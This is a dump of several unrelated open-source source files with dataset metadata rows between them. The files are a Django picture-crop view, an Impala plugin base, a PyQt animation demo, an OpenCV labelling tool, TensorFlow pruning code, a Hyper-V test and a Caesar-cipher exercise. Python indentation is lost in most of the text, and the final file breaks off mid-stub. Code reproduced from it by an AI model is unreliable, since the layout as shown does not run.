except Exception as e:
print(e)
return redirect('/settings/picture/')
@login_required
def save_uploaded_picture(request):
try:
x = int(request.POST.get('x'))
y = int(request.POST.get('y'))
w = int(request.POST.get('w'))
h = int(request.POST.get('h'))
tmp_filename = django_settings.MEDIA_ROOT + '/profile_pictures/' +\
request.user.username + '_tmp.jpg'
filename = django_settings.MEDIA_ROOT + '/profile_pictures/' +\
request.user.username + '.jpg'
im = Image.open(tmp_filename)
cropped_im = im.crop((x, y, w+x, h+y))
cropped_im.thumbnail((200, 200), Image.ANTIALIAS)
cropped_im.save(filename)
os.remove(tmp_filename)
except Exception:
pass
return redirect('/settings/picture/')
| mit | -7,148,828,891,179,885,000 | 31.871951 | 76 | 0.621035 | false |
cloudera/Impala | tests/benchmark/plugins/__init__.py | 3 | 1407 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
class Plugin(object):
'''Base plugin class.
Defines the interfaces that all plugins will use.
The interface consists of:
* The scope, which defines when the plugin will run.
The different scopes are:
* per query
* per workload
* per test suite run
* A pre-hook method, which is run at the beginning of the 'scope'
* A post-hook method, which is run at the end of the scope.
'''
__name__ = "BasePlugin"
def __init__(self, scope=None):
self.scope = scope
def run_pre_hook(self, context=None):
pass
def run_post_hook(self, context=None):
pass
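# Illustrative sketch (not part of the original module): a minimal plugin that
# overrides both hooks. The print statements are an assumption used for
# demonstration only; the framework imposes no particular behaviour.
class ExamplePlugin(Plugin):
  __name__ = "ExamplePlugin"

  def run_pre_hook(self, context=None):
    print("%s: entering scope %s" % (self.__name__, self.scope))

  def run_post_hook(self, context=None):
    print("%s: leaving scope %s" % (self.__name__, self.scope))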
| apache-2.0 | -3,696,564,679,421,713,400 | 34.175 | 70 | 0.711443 | false |
anomitra/articleScraper | PyQt-gpl-5.4.1/examples/animation/moveblocks.py | 2 | 8146 | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PyQt5.QtCore import (QAbstractTransition, QEasingCurve, QEvent,
QParallelAnimationGroup, QPropertyAnimation, qrand, QRect,
QSequentialAnimationGroup, qsrand, QState, QStateMachine, Qt, QTime,
QTimer)
from PyQt5.QtWidgets import (QApplication, QGraphicsScene, QGraphicsView,
QGraphicsWidget)
class StateSwitchEvent(QEvent):
StateSwitchType = QEvent.User + 256
def __init__(self, rand=0):
super(StateSwitchEvent, self).__init__(StateSwitchEvent.StateSwitchType)
self.m_rand = rand
def rand(self):
return self.m_rand
class QGraphicsRectWidget(QGraphicsWidget):
def paint(self, painter, option, widget):
painter.fillRect(self.rect(), Qt.blue)
class StateSwitchTransition(QAbstractTransition):
def __init__(self, rand):
super(StateSwitchTransition, self).__init__()
self.m_rand = rand
def eventTest(self, event):
return (event.type() == StateSwitchEvent.StateSwitchType and
event.rand() == self.m_rand)
def onTransition(self, event):
pass
class StateSwitcher(QState):
def __init__(self, machine):
super(StateSwitcher, self).__init__(machine)
self.m_stateCount = 0
self.m_lastIndex = 0
def onEntry(self, event):
n = qrand() % self.m_stateCount + 1
while n == self.m_lastIndex:
n = qrand() % self.m_stateCount + 1
self.m_lastIndex = n
self.machine().postEvent(StateSwitchEvent(n))
def onExit(self, event):
pass
def addState(self, state, animation):
self.m_stateCount += 1
trans = StateSwitchTransition(self.m_stateCount)
trans.setTargetState(state)
self.addTransition(trans)
trans.addAnimation(animation)
def createGeometryState(w1, rect1, w2, rect2, w3, rect3, w4, rect4, parent):
result = QState(parent)
result.assignProperty(w1, 'geometry', rect1)
result.assignProperty(w2, 'geometry', rect2)
result.assignProperty(w3, 'geometry', rect3)
result.assignProperty(w4, 'geometry', rect4)
return result
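# createGeometryState returns a QState that, when entered, assigns the given
# target rectangles to the four blocks; the easing animations attached to the
# transitions below make those moves gradual.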
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
button1 = QGraphicsRectWidget()
button2 = QGraphicsRectWidget()
button3 = QGraphicsRectWidget()
button4 = QGraphicsRectWidget()
button2.setZValue(1)
button3.setZValue(2)
button4.setZValue(3)
scene = QGraphicsScene(0, 0, 300, 300)
scene.setBackgroundBrush(Qt.black)
scene.addItem(button1)
scene.addItem(button2)
scene.addItem(button3)
scene.addItem(button4)
window = QGraphicsView(scene)
window.setFrameStyle(0)
window.setAlignment(Qt.AlignLeft | Qt.AlignTop)
window.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
window.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
machine = QStateMachine()
group = QState()
timer = QTimer()
timer.setInterval(1250)
timer.setSingleShot(True)
group.entered.connect(timer.start)
state1 = createGeometryState(button1, QRect(100, 0, 50, 50), button2,
QRect(150, 0, 50, 50), button3, QRect(200, 0, 50, 50), button4,
QRect(250, 0, 50, 50), group)
state2 = createGeometryState(button1, QRect(250, 100, 50, 50), button2,
QRect(250, 150, 50, 50), button3, QRect(250, 200, 50, 50), button4,
QRect(250, 250, 50, 50), group)
state3 = createGeometryState(button1, QRect(150, 250, 50, 50), button2,
QRect(100, 250, 50, 50), button3, QRect(50, 250, 50, 50), button4,
QRect(0, 250, 50, 50), group)
state4 = createGeometryState(button1, QRect(0, 150, 50, 50), button2,
QRect(0, 100, 50, 50), button3, QRect(0, 50, 50, 50), button4,
QRect(0, 0, 50, 50), group)
state5 = createGeometryState(button1, QRect(100, 100, 50, 50), button2,
QRect(150, 100, 50, 50), button3, QRect(100, 150, 50, 50), button4,
QRect(150, 150, 50, 50), group)
state6 = createGeometryState(button1, QRect(50, 50, 50, 50), button2,
QRect(200, 50, 50, 50), button3, QRect(50, 200, 50, 50), button4,
QRect(200, 200, 50, 50), group)
state7 = createGeometryState(button1, QRect(0, 0, 50, 50), button2,
QRect(250, 0, 50, 50), button3, QRect(0, 250, 50, 50), button4,
QRect(250, 250, 50, 50), group)
group.setInitialState(state1)
animationGroup = QParallelAnimationGroup()
anim = QPropertyAnimation(button4, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
animationGroup.addAnimation(anim)
subGroup = QSequentialAnimationGroup(animationGroup)
subGroup.addPause(100)
anim = QPropertyAnimation(button3, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
subGroup.addAnimation(anim)
subGroup = QSequentialAnimationGroup(animationGroup)
subGroup.addPause(150)
anim = QPropertyAnimation(button2, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
subGroup.addAnimation(anim)
subGroup = QSequentialAnimationGroup(animationGroup)
subGroup.addPause(200)
anim = QPropertyAnimation(button1, 'geometry')
anim.setDuration(1000)
anim.setEasingCurve(QEasingCurve.OutElastic)
subGroup.addAnimation(anim)
stateSwitcher = StateSwitcher(machine)
group.addTransition(timer.timeout, stateSwitcher)
stateSwitcher.addState(state1, animationGroup)
stateSwitcher.addState(state2, animationGroup)
stateSwitcher.addState(state3, animationGroup)
stateSwitcher.addState(state4, animationGroup)
stateSwitcher.addState(state5, animationGroup)
stateSwitcher.addState(state6, animationGroup)
stateSwitcher.addState(state7, animationGroup)
machine.addState(group)
machine.setInitialState(group)
machine.start()
window.resize(300, 300)
window.show()
qsrand(QTime(0, 0, 0).secsTo(QTime.currentTime()))
sys.exit(app.exec_())
| gpl-2.0 | -7,652,856,938,194,048,000 | 33.961373 | 80 | 0.677019 | false |
jskye/car-classifier-research | src/image.proc.tools/py/labelroi.py | 1 | 4177 | # USAGE
# python labelroi.py    (labels regions of interest in every *.jpg file in the current directory)
# import the necessary packages
import argparse
import cv2
import glob
# from gi.repository import Gtk
# initialize the list of reference points and boolean indicating
# whether cropping is being performed or not
refPt = []
cropping = False
outputimageFile = "labels.txt"
imgcounter = 0
roicounter = 0
lastroi = ""
lastImage = None
def click_and_crop(event, x, y, flags, param):
# grab references to the global variables
global refPt, cropping, imgcounter, roicounter, lastroi, lastImage
# if the left mouse button was clicked, record the starting
# (x, y) coordinates and indicate that cropping is being
# performed
if event == cv2.EVENT_LBUTTONDOWN:
#keep copy of current Image in case roi drawn wrong
lastImage = image.copy()
refPt = [(x, y)]
cropping = True
# write last roi to file. (assumes that a new roi means last was good)
with open(outputimageFile, 'a') as results:
results.write(lastroi)
lastroi = ""
# check to see if the left mouse button was released
elif event == cv2.EVENT_LBUTTONUP:
# increment roicounter
roicounter+=1
# record the ending (x, y) coordinates and indicate that
# the cropping operation is finished
refPt.append((x, y))
cropping = False
# draw a rectangle around the region of interest
cv2.rectangle(image, refPt[0], refPt[1], (0, 255, 0), 2)
cv2.imshow("image", image)
print(globalimageFile)
print("imgcounter: "+str(imgcounter))
print("roicounter: "+str(roicounter))
# with open(outputimageFile, 'a') as results:
# if roicounter>1:
# # print("writingtab")
# results.write("\t")
# results.write(str(refPt[0][0]) + " " \
# + str(refPt[0][1]) + " " \
# + str(refPt[1][0] - refPt[0][0]) + " " \
# + str(refPt[1][1] - refPt[0][1]))
# results.close()
if roicounter>1:
lastroi+="\t"
lastroi+=str(refPt[0][0]) + " "
lastroi+=str(refPt[0][1]) + " "
lastroi+=str(abs(refPt[1][0] - refPt[0][0])) + " "
lastroi+=str(abs(refPt[1][1] - refPt[0][1]))
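# Each line appended to labels.txt has the form:
#   <image filename> <image index> <x> <y> <w> <h>[\t<x> <y> <w> <h> ...]
# i.e. one line per image with a whitespace-separated rectangle for every
# region drawn on it (a region is only written once the next one is started
# or the image is confirmed with the 'c' key).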
# construct the argument parser and parse the arguments
# ap = argparse.ArgumentParser()
# ap.add_argument("-i", "--image", required=True, help="Path to the image")
# args = vars(ap.parse_args())
imageFiles=sorted(glob.glob("*.jpg"))
for imageFile in imageFiles:
imgcounter+=1
roicounter = 0
globalimageFile = imageFile
with open(outputimageFile, 'a') as results:
if imgcounter>1:
results.write("\n")
results.write(globalimageFile + " "+str(imgcounter) + " ")
results.close()
	# load the image, keep a copy of the original, and set up the mouse callback function
# image = cv2.imread(args["image"])
image = cv2.imread(imageFile)
originalImage = image.copy()
cv2.namedWindow("image")
cv2.setMouseCallback("image", click_and_crop)
# keep looping until the 'q' key is pressed
while True:
# display the image and wait for a keypress
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
# if the 'o' key is pressed, reset the image
# if key == ord("o"):
# # restore to original copy
# image = originalImage.copy()
# # delete last roi
# lastroi = ""
		# if the 'r' key is pressed, reset the image to the last copy and discard the last ROI
if key == ord("r"):
#TODO: remove last line of output file.
# copy image after every Rectangle
roicounter-=1
# restore to last copy
image = lastImage.copy()
cv2.imshow("image", image)
# delete last roi
lastroi = ""
# if the 'c' key is pressed, break from the loop
elif key == ord("c"):
# write last roi to file. (assumes that a new roi means last was good)
with open(outputimageFile, 'a') as results:
results.write(lastroi)
lastroi = ""
break
elif key == ord("q"):
#TODO: warn user quitting without a roi on an Image
# can use GTK crossplatform dialog
# http://python-gtk-3-tutorial.readthedocs.org/en/latest/dialogs.html
exit()
# # if there are two reference points, then crop the region of interest
# # from teh image and display it
# if len(refPt) == 2:
# roi = originalImage[refPt[0][1]:refPt[1][1], refPt[0][0]:refPt[1][0]]
# cv2.imshow("ROI", roi)
# cv2.waitKey(0)
# close all open windows
cv2.destroyAllWindows()
| mit | -3,855,644,297,113,608,000 | 30.406015 | 75 | 0.67321 | false |
tensorflow/model-optimization | tensorflow_model_optimization/python/core/sparsity/keras/prune.py | 1 | 9714 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access,missing-docstring,unused-argument
"""Entry point for pruning models during training."""
import tensorflow as tf
from tensorflow_model_optimization.python.core.keras import metrics
from tensorflow_model_optimization.python.core.sparsity.keras import pruning_schedule as pruning_sched
from tensorflow_model_optimization.python.core.sparsity.keras import pruning_wrapper
keras = tf.keras
custom_object_scope = tf.keras.utils.custom_object_scope
def prune_scope():
"""Provides a scope in which Pruned layers and models can be deserialized.
For TF 2.X: this is not needed for SavedModel or TF checkpoints, which are
the recommended serialization formats.
For TF 1.X: if a tf.keras h5 model or layer has been pruned, it needs to be
within this
scope to be successfully deserialized. This is not needed for loading just
keras weights.
Returns:
Object of type `CustomObjectScope` with pruning objects included.
Example:
```python
pruned_model = prune_low_magnitude(model, **self.params)
keras.models.save_model(pruned_model, keras_file)
with prune_scope():
loaded_model = keras.models.load_model(keras_file)
```
"""
return custom_object_scope(
{'PruneLowMagnitude': pruning_wrapper.PruneLowMagnitude})
@metrics.MonitorBoolGauge('prune_low_magnitude_usage')
def prune_low_magnitude(to_prune,
pruning_schedule=pruning_sched.ConstantSparsity(0.5, 0),
block_size=(1, 1),
block_pooling_type='AVG',
pruning_policy=None,
**kwargs):
"""Modify a tf.keras layer or model to be pruned during training.
This function wraps a tf.keras model or layer with pruning functionality which
sparsifies the layer's weights during training. For example, using this with
50% sparsity will ensure that 50% of the layer's weights are zero.
The function accepts either a single keras layer
(subclass of `tf.keras.layers.Layer`), list of keras layers or a Sequential
or Functional tf.keras model and handles them appropriately.
If it encounters a layer it does not know how to handle, it will throw an
error. While pruning an entire model, even a single unknown layer would lead
to an error.
Prune a model:
```python
pruning_params = {
'pruning_schedule': ConstantSparsity(0.5, 0),
'block_size': (1, 1),
'block_pooling_type': 'AVG'
}
model = prune_low_magnitude(
keras.Sequential([
layers.Dense(10, activation='relu', input_shape=(100,)),
layers.Dense(2, activation='sigmoid')
]), **pruning_params)
```
Prune a layer:
```python
pruning_params = {
'pruning_schedule': PolynomialDecay(initial_sparsity=0.2,
final_sparsity=0.8, begin_step=1000, end_step=2000),
'block_size': (2, 3),
'block_pooling_type': 'MAX'
}
model = keras.Sequential([
layers.Dense(10, activation='relu', input_shape=(100,)),
prune_low_magnitude(layers.Dense(2, activation='tanh'), **pruning_params)
])
```
Pretrained models: you must first load the weights and then apply the
prune API:
```python
model.load_weights(...)
model = prune_low_magnitude(model)
```
Optimizer: this function removes the optimizer. The user is expected to
compile the model
again. It's easiest to rely on the default (step starts at 0) and then
use that to determine the desired begin_step for the pruning_schedules.
Checkpointing: checkpointing should include the optimizer, not just the
  weights. Pruning supports checkpointing, though upon inspection
  the weights of checkpoints are not sparse
(https://github.com/tensorflow/model-optimization/issues/206).
Arguments:
to_prune: A single keras layer, list of keras layers, or a
`tf.keras.Model` instance.
pruning_schedule: A `PruningSchedule` object that controls pruning rate
throughout training.
block_size: (optional) The dimensions (height, weight) for the block
sparse pattern in rank-2 weight tensors.
block_pooling_type: (optional) The function to use to pool weights in the
block. Must be 'AVG' or 'MAX'.
pruning_policy: (optional) The object that controls to which layers
`PruneLowMagnitude` wrapper will be applied. This API is experimental
and is subject to change.
**kwargs: Additional keyword arguments to be passed to the keras layer.
Ignored when to_prune is not a keras layer.
Returns:
Layer or model modified with pruning wrappers. Optimizer is removed.
Raises:
ValueError: if the keras layer is unsupported, or the keras model contains
an unsupported layer.
"""
def _prune_list(layers, **params):
wrapped_layers = []
for layer in layers:
# Allow layer that is already wrapped by the pruning wrapper
# to be used as is.
# No need to wrap the input layer either.
if isinstance(layer, pruning_wrapper.PruneLowMagnitude):
wrapped_layers.append(layer)
elif isinstance(layer, keras.layers.InputLayer):
# TODO(yunluli): Replace with a clone function in keras.
wrapped_layers.append(layer.__class__.from_config(layer.get_config()))
else:
wrapped_layers.append(
pruning_wrapper.PruneLowMagnitude(layer, **params))
return wrapped_layers
def _add_pruning_wrapper(layer):
if isinstance(layer, keras.Model):
# Check whether the model is a subclass model.
if (not layer._is_graph_network and
not isinstance(layer, keras.models.Sequential)):
raise ValueError('Subclassed models are not supported currently.')
return keras.models.clone_model(
layer, input_tensors=None, clone_function=_add_pruning_wrapper)
if isinstance(layer, pruning_wrapper.PruneLowMagnitude):
return layer
if pruning_policy and not pruning_policy.allow_pruning(layer):
return layer
else:
return pruning_wrapper.PruneLowMagnitude(layer, **params)
params = {
'pruning_schedule': pruning_schedule,
'block_size': block_size,
'block_pooling_type': block_pooling_type
}
is_sequential_or_functional = isinstance(
to_prune, keras.Model) and (isinstance(to_prune, keras.Sequential) or
to_prune._is_graph_network)
# A subclassed model is also a subclass of keras.layers.Layer.
is_keras_layer = isinstance(
to_prune, keras.layers.Layer) and not isinstance(to_prune, keras.Model)
if isinstance(to_prune, list):
return _prune_list(to_prune, **params)
elif is_sequential_or_functional:
if pruning_policy:
pruning_policy.ensure_model_supports_pruning(to_prune)
return _add_pruning_wrapper(to_prune)
elif is_keras_layer:
params.update(kwargs)
return pruning_wrapper.PruneLowMagnitude(to_prune, **params)
else:
raise ValueError(
'`prune_low_magnitude` can only prune an object of the following '
'types: tf.keras.models.Sequential, tf.keras functional model, '
'tf.keras.layers.Layer, list of tf.keras.layers.Layer. You passed '
'an object of type: {input}.'.format(input=to_prune.__class__.__name__))
def strip_pruning(model):
"""Strip pruning wrappers from the model.
Once a model has been pruned to required sparsity, this method can be used
to restore the original model with the sparse weights.
Only sequential and functional models are supported for now.
Arguments:
model: A `tf.keras.Model` instance with pruned layers.
Returns:
A keras model with pruning wrappers removed.
Raises:
ValueError: if the model is not a `tf.keras.Model` instance.
NotImplementedError: if the model is a subclass model.
Usage:
```python
orig_model = tf.keras.Model(inputs, outputs)
pruned_model = prune_low_magnitude(orig_model)
exported_model = strip_pruning(pruned_model)
```
The exported_model and the orig_model share the same structure.
"""
if not isinstance(model, keras.Model):
raise ValueError(
'Expected model to be a `tf.keras.Model` instance but got: ', model)
def _strip_pruning_wrapper(layer):
if isinstance(layer, tf.keras.Model):
# A keras model with prunable layers
return keras.models.clone_model(
layer, input_tensors=None, clone_function=_strip_pruning_wrapper)
if isinstance(layer, pruning_wrapper.PruneLowMagnitude):
      # The _batch_input_shape attribute in the first layer allows a Sequential
      # model to be built. This makes sure that when we remove the wrapper from
      # the first layer, the model's built state is preserved.
if not hasattr(layer.layer, '_batch_input_shape') and hasattr(
layer, '_batch_input_shape'):
layer.layer._batch_input_shape = layer._batch_input_shape
return layer.layer
return layer
return keras.models.clone_model(
model, input_tensors=None, clone_function=_strip_pruning_wrapper)
| apache-2.0 | -797,842,022,771,012,500 | 35.795455 | 102 | 0.693226 | false |
angdraug/nova | nova/tests/virt/hyperv/test_utilsfactory.py | 12 | 2094 | # Copyright 2014 Cloudbase Solutions SRL
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for the Hyper-V utils factory.
"""
import mock
from oslo.config import cfg
from nova import test
from nova.virt.hyperv import hostutils
from nova.virt.hyperv import utilsfactory
from nova.virt.hyperv import vmutils
from nova.virt.hyperv import vmutilsv2
CONF = cfg.CONF
class TestHyperVUtilsFactory(test.NoDBTestCase):
def test_get_vmutils_force_v1_and_min_version(self):
self._test_returned_class(None, True, True)
def test_get_vmutils_v2(self):
self._test_returned_class(vmutilsv2.VMUtilsV2, False, True)
def test_get_vmutils_v2_r2(self):
self._test_returned_class(vmutils.VMUtils, False, False)
def test_get_vmutils_force_v1_and_not_min_version(self):
self._test_returned_class(vmutils.VMUtils, True, False)
def _test_returned_class(self, expected_class, force_v1, os_supports_v2):
CONF.set_override('force_hyperv_utils_v1', force_v1, 'hyperv')
with mock.patch.object(
hostutils.HostUtils,
'check_min_windows_version') as mock_check_min_windows_version:
mock_check_min_windows_version.return_value = os_supports_v2
if os_supports_v2 and force_v1:
self.assertRaises(vmutils.HyperVException,
utilsfactory.get_vmutils)
else:
actual_class = type(utilsfactory.get_vmutils())
self.assertEqual(actual_class, expected_class)
| apache-2.0 | -8,863,784,196,907,203,000 | 35.736842 | 78 | 0.689112 | false |
chielk/dndmake | dndraces/elf.py | 1 | 2365 | from dndraces import Race
import random
class Elf(Race):
NAME = "elf"
LAWFULNESS = (-3, 2) # mu, sigma
GOODNESS = (2, 2) # mu, sigma
HAIR = {"black": 20,
"brown": 35,
"blond": 15,
"ginger": 8,
"green": 1,
"blue": 1,
"white": 1,
"red": 1,
}
EYES = {"blue": 20,
"brown": 40,
"green": 10,
"black": 10,
"red": 1,
"violet": 1,
}
MALE_NAME = ["Aramil",
"Aust",
"Enialis",
"Heian",
"Himo",
"Ivellios",
"Lau-cian",
"Quarion",
"Soverliss",
"Thamior",
"Tharivol"]
FEMALE_NAME = ["Anastrianna",
"Antinua",
"Drusilia",
"Felosial",
"Ielenia",
"Lia",
"Mialee",
"Qillathe",
"Silaqui",
"Vadania",
"Valanthe",
"Xanaphia"]
FAMILY_NAME = ["Amastacia (Starflower)",
"Amakiir (Gemflower)",
"Galanodel (Moonwhisper)",
"Holimion (Diamonddew)",
"Liadon (Silverfrond)",
"Meliamne (Oakenheel)",
"Naïlo (Nightbreeze)",
"Siannodel (Moonbrook)",
"Ilphukiir (Gemblossom)",
"Xiloscient (Goldpetal)"]
# Gender Base Height Height Modifier Base Weight Weight Modifier
# Male 4' 5" +2d6 85 lb. x (1d6) lb.
# Female 4' 5" +2d6 80 lb. x (1d6) lb.
H_MOD = "2d6"
H_UNIT = "inch"
W_MOD = "1d6"
W_UNIT = "lbs"
class Male(Race.Male):
H_BASE = "4'5\""
W_BASE = "85lbs"
class Female(Race.Female):
H_BASE = "4'5\""
W_BASE = "80lbs"
def make_name(self):
if self.gender.NAME == "male":
first_name = random.choice(self.MALE_NAME)
else:
first_name = random.choice(self.FEMALE_NAME)
family_name = random.choice(self.FAMILY_NAME)
self.name = first_name + " " + family_name
| gpl-3.0 | -3,738,826,518,536,718,300 | 25.863636 | 69 | 0.388325 | false |
kdeloach/nyc-trees | src/nyc_trees/nyc_trees/settings/production.py | 3 | 3371 | """Production settings and globals."""
from os import environ
from dns import resolver, exception
from boto.utils import get_instance_metadata
from base import * # NOQA
# Normally you should not import ANYTHING from Django directly
# into your settings, but ImproperlyConfigured is an exception.
from django.core.exceptions import ImproperlyConfigured
def get_env_setting(setting):
""" Get the environment setting or return exception """
try:
return environ[setting]
except KeyError:
error_msg = "Set the %s env variable" % setting
raise ImproperlyConfigured(error_msg)
instance_metadata = get_instance_metadata(timeout=5)
if not instance_metadata:
raise ImproperlyConfigured('Unable to access the instance metadata')
# HOST CONFIGURATION
# See: https://docs.djangoproject.com/en/1.5/releases/1.5/#allowed-hosts-required-in-production # NOQA
ALLOWED_HOSTS = [
'treescount.nycgovparks.org',
'training.treescount.azavea.com',
'treescount.azavea.com',
'.elb.amazonaws.com',
'localhost'
]
# ELBs use the instance IP in the Host header and ALLOWED_HOSTS checks against
# the Host header.
ALLOWED_HOSTS.append(instance_metadata['local-ipv4'])
# END HOST CONFIGURATION
# EMAIL CONFIGURATION
EMAIL_BACKEND = 'apps.core.mail.backends.boto.EmailBackend'
EMAIL_BOTO_CHECK_QUOTA = False
# END EMAIL CONFIGURATION
# SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = get_env_setting('DJANGO_SECRET_KEY')
# END SECRET CONFIGURATION
# TILER CONFIGURATION
try:
import logging
logger = logging.getLogger(__name__)
# Lookup the CNAME record for TILER_HOST. Should be
# tile.service.nyc-trees.internal and resolve to the CloudFront
# distribution FQDN.
answers = resolver.query(environ.get('TILER_HOST'), 'CNAME')
if answers:
# Remove trailing period because that's part of the DNS specification.
TILER_URL = '//%s' % (str(answers[0]).rstrip('.'))
else:
logger.debug('TILER_HOST DNS query returned no answers')
except exception.DNSException:
logger.exception('Failed to resolve TILER_HOST, %s' %
environ.get('TILER_HOST'))
# END TILER CONFIGURATION
# Django Storages CONFIGURATION
mac_metadata = instance_metadata['network']['interfaces']['macs']
vpc_id = mac_metadata.values()[0]['vpc-id']
# The VPC id should stay the same for all app servers in a particular
# environment and remain the same after a new deploy, but differ between
# environments. This makes it a suitable S3 bucket name
AWS_STORAGE_BUCKET_NAME = 'django-storages-{}'.format(vpc_id)
AWS_AUTO_CREATE_BUCKET = True
DEFAULT_FILE_STORAGE = 'libs.custom_storages.PublicS3BotoStorage'
# The PRIVATE_AWS_STORAGE_* settings configure the S3 bucket
# used for files only accessible by census admins (e.g. data dumps)
PRIVATE_AWS_STORAGE_BUCKET_NAME = 'django-storages-private-{}'.format(vpc_id)
PRIVATE_AWS_STORAGE_AUTO_CREATE_BUCKET = True
# The number of seconds that a generated link to a file in the private
# bucket is active.
PRIVATE_AWS_STORAGE_QUERYSTRING_EXPIRE = 30
PRIVATE_AWS_STORAGE_DEFAULT_ACL = 'private'
PRIVATE_AWS_STORAGE_URL_PROTOCOL = 'https:'
# There is no need to specify access key or secret key
# They are pulled from the instance metadata by Boto
# END Django Storages CONFIGURATION
| agpl-3.0 | -5,422,635,833,353,874,000 | 32.04902 | 103 | 0.735983 | false |
stefan-caraiman/python-lab | python/solutii/vlad_cristia_avram/caesar/caesar.py | 5 | 1200 | """Solution to the caesar problem"""
from __future__ import print_function
def gaseste_cheia(mesaj):
"""Aflam cheia mesajului"""
prima_litera = mesaj[0]
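    # Key recovery assumes (as in this exercise) that the plaintext starts
    # with 'a': the key is the shift that wraps the first ciphertext letter
    # back around past 'z' to 'a'. For example, a message starting with 'x'
    # gives cheie = (ord('z') + 1 - ord('x')) % 26 = 3.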
cheie = (ord('z') + 1 - ord(prima_litera)) % 26
return cheie
def afiseaza_mesajul(mesaj, cheie):
"""Functie de afisare mesaj"""
for litera in mesaj:
aux2 = ord(litera)
aux = ord('z')
if litera.isalpha():
if aux2 + cheie > aux:
litera = chr(aux2 + cheie - aux + ord('a') - 1)
print(litera, end="")
else:
litera = chr(aux2 + cheie)
print(litera, end="")
else:
print(litera, end="")
print()
def decripteaza_mesajul(mesaj):
"""Functia de decriptare a mesajului"""
cheie = gaseste_cheia(mesaj)
afiseaza_mesajul(mesaj, cheie)
def main():
"""Functia main a programului"""
try:
fisier = open("mesaje.secret", "r")
mesaje = fisier.read()
fisier.close()
except IOError:
print("Nu am putut obtine mesajele.")
return
for mesaj in mesaje.splitlines():
decripteaza_mesajul(mesaj)
if __name__ == "__main__":
main()
| mit | 6,510,986,399,228,709,000 | 22.529412 | 63 | 0.544167 | false |
switowski/cds-demosite | cds/base/recordext/functions/sync_corparate_names.py | 12 | 1885 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from invenio.modules.jsonalchemy.jsonext.functions.util_merge_fields_info_list \
import util_merge_fields_info_list
def sync_corparate_names(self, field_name, connected_field, action): # pylint: disable=W0613
"""
Sync meeting names content only when `__setitem__` or similar is used
"""
